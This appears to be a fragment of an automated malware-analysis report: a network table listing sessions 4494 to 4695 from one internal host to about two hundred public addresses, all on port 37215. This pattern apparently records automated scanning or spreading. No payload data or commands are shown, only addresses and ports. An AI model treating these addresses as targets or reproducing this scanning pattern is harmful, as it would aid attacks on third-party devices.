                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4494192.168.2.156034841.174.174.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4495192.168.2.155774841.92.85.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4496192.168.2.155884841.29.46.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4497192.168.2.155237441.38.156.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4498192.168.2.154975841.31.105.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4499192.168.2.154427241.33.68.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4500192.168.2.154948641.157.216.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4501192.168.2.154370041.209.154.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4502192.168.2.153916041.80.195.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4503192.168.2.155462841.116.217.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4504192.168.2.155179441.221.36.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4505192.168.2.154209841.182.62.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4506192.168.2.154883441.187.178.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4507192.168.2.155892841.87.16.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4508192.168.2.154949841.242.87.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4509192.168.2.154676841.123.127.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4510192.168.2.154620441.91.80.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4511192.168.2.154946641.136.0.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4512192.168.2.153781641.212.124.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4513192.168.2.153980441.203.2.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4514192.168.2.153851241.221.115.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4515192.168.2.154704841.142.54.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4516192.168.2.155066241.93.167.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4517192.168.2.155770641.139.226.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4518192.168.2.153397841.108.1.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4519192.168.2.154483241.245.110.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4520192.168.2.153833641.184.137.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4521192.168.2.155835441.207.60.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4522192.168.2.155046441.87.238.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4523192.168.2.154831241.157.34.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4524192.168.2.154005241.147.68.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4525192.168.2.154644241.171.71.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4526192.168.2.155289241.12.81.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4527192.168.2.154663841.47.33.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4528192.168.2.154352041.206.80.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4529192.168.2.154777241.74.120.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4530192.168.2.153737841.186.231.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4531192.168.2.153409241.89.106.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4532192.168.2.154704641.205.169.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4533192.168.2.153904041.241.125.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4534192.168.2.153853041.227.126.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4535192.168.2.154277841.254.28.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4536192.168.2.154468441.161.131.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4537192.168.2.154120841.2.6.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4538192.168.2.153788441.209.100.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4539192.168.2.154308041.128.2.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4540192.168.2.154298241.19.167.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4541192.168.2.155187441.125.248.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4542192.168.2.154226441.206.27.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4543192.168.2.155745441.144.67.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4544192.168.2.155251241.230.238.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4545192.168.2.155309641.125.82.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4546192.168.2.154294841.228.191.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4547192.168.2.156081841.85.171.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4548192.168.2.154192041.25.176.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4549192.168.2.153588241.205.151.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4550192.168.2.155000241.3.45.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4551192.168.2.154984441.30.245.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4552192.168.2.153879041.37.192.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4553192.168.2.153629841.233.186.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4554192.168.2.154550841.67.169.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4555192.168.2.154392641.122.106.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4556192.168.2.154673841.140.59.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4557192.168.2.154585641.215.70.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4558192.168.2.153826241.159.8.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4559192.168.2.153823841.131.114.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4560192.168.2.154968841.233.153.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4561192.168.2.154443441.252.91.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4562192.168.2.154827241.172.180.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4563192.168.2.155817441.223.212.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4564192.168.2.153599641.190.114.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4565192.168.2.154136241.81.9.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4566192.168.2.154877241.32.5.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4567192.168.2.154411441.113.6.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4568192.168.2.154384441.90.91.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4569192.168.2.153448441.83.164.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4570192.168.2.155063441.36.167.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4571192.168.2.155682441.41.11.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4572192.168.2.155555241.207.219.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4573192.168.2.153834041.231.75.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4574192.168.2.153440041.171.93.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4575192.168.2.155620041.128.145.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4576192.168.2.154363841.35.96.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4577192.168.2.153455641.168.185.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4578192.168.2.153315641.46.196.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4579192.168.2.153979241.154.119.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4580192.168.2.155370841.136.181.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4581192.168.2.155216641.178.107.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4582192.168.2.153836641.43.242.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4583192.168.2.154296841.29.8.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4584192.168.2.154052041.47.127.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4585192.168.2.154944441.102.173.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4586192.168.2.154571641.171.97.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4587192.168.2.155470241.63.91.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4588192.168.2.155575041.192.229.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4589192.168.2.153599441.215.149.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4590192.168.2.156007841.185.84.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4591192.168.2.153793841.255.188.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4592192.168.2.155391241.163.95.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4593192.168.2.154589641.248.208.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4594192.168.2.154519441.190.208.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4595192.168.2.155862041.88.103.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4596192.168.2.155936241.203.241.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4597192.168.2.153459841.51.197.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4598192.168.2.156098441.92.188.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4599192.168.2.154265241.239.138.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4600192.168.2.155529641.79.83.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4601192.168.2.153728841.108.231.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4602192.168.2.154112441.98.194.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4603192.168.2.154975841.120.190.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4604192.168.2.154602441.153.151.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4605192.168.2.154856241.47.110.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4606192.168.2.153781041.44.194.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4607192.168.2.154380841.48.244.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4608192.168.2.153947841.163.235.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4609192.168.2.155123841.215.169.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4610192.168.2.155847241.108.255.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4611192.168.2.156038641.163.193.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4612192.168.2.155595841.44.146.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4613192.168.2.155360441.177.200.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4614192.168.2.154584241.82.200.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4615192.168.2.153946241.143.64.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4616192.168.2.153607641.131.224.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4617192.168.2.154140241.19.231.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4618192.168.2.153413041.135.71.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4619192.168.2.156070641.151.32.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4620192.168.2.153332641.116.75.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4621192.168.2.155200441.77.75.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4622192.168.2.155921041.31.184.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4623192.168.2.153512041.191.104.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4624192.168.2.153879641.178.221.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4625192.168.2.154401641.138.56.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4626192.168.2.155350041.53.73.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4627192.168.2.155084441.0.114.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4628192.168.2.153902041.249.114.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4629192.168.2.154905441.1.99.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4630192.168.2.154305841.63.123.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4631192.168.2.154480641.102.55.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4632192.168.2.153436841.239.186.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4633192.168.2.154694641.55.93.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4634192.168.2.153824241.56.44.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4635192.168.2.154545641.27.60.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4636192.168.2.153393641.19.136.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4637192.168.2.154263441.22.161.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4638192.168.2.153799841.133.228.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4639192.168.2.154934641.167.142.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4640192.168.2.155429841.222.41.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4641192.168.2.155623441.175.7.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4642192.168.2.155508041.124.32.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4643192.168.2.154607641.15.214.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4644192.168.2.154056841.72.19.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4645192.168.2.153834041.144.111.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4646192.168.2.154050641.157.5.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4647192.168.2.153495841.48.206.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4648192.168.2.154366841.253.131.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4649192.168.2.153823241.74.170.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4650192.168.2.153623641.88.216.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4651192.168.2.153955841.243.233.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4652192.168.2.1538616197.235.11.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4653192.168.2.1552222197.131.89.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4654192.168.2.1550246197.90.205.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4655192.168.2.1546994197.182.88.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4656192.168.2.1557570197.85.224.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4657192.168.2.1549616197.0.198.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4658192.168.2.1550300197.198.195.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4659192.168.2.1550354197.70.184.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4660192.168.2.1554036197.189.247.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4661192.168.2.1555346197.57.78.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4662192.168.2.1557200197.118.26.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4663192.168.2.1537854197.106.232.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4664192.168.2.1537828197.12.148.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4665192.168.2.1547088197.148.71.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4666192.168.2.1557786197.122.39.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4667192.168.2.1540824197.186.91.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4668192.168.2.1560474197.192.219.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4669192.168.2.1541550197.183.170.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4670192.168.2.1553000197.54.44.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4671192.168.2.1559754197.113.53.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4672192.168.2.1560278197.72.11.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4673192.168.2.1536776197.58.129.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4674192.168.2.1540776197.8.71.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4675192.168.2.1533374197.9.0.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4676192.168.2.1538592197.237.236.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4677192.168.2.1558692197.164.12.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4678192.168.2.1559126197.48.230.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4679192.168.2.1545850197.254.206.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4680192.168.2.1559422197.10.244.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4681192.168.2.1559700197.125.78.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4682192.168.2.1558340197.144.244.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4683192.168.2.1553236197.201.63.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4684192.168.2.1542492197.50.181.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4685192.168.2.1554724197.195.68.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4686192.168.2.1537120197.119.75.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4687192.168.2.1559400197.74.67.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4688192.168.2.1537014197.182.140.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4689192.168.2.1544614197.221.55.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4690192.168.2.1550676197.93.255.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4691192.168.2.1560966197.220.79.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4692192.168.2.1547874197.206.31.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4693192.168.2.1533116197.125.140.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4694192.168.2.1536504197.130.198.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4695192.168.2.1556836197.250.255.437215
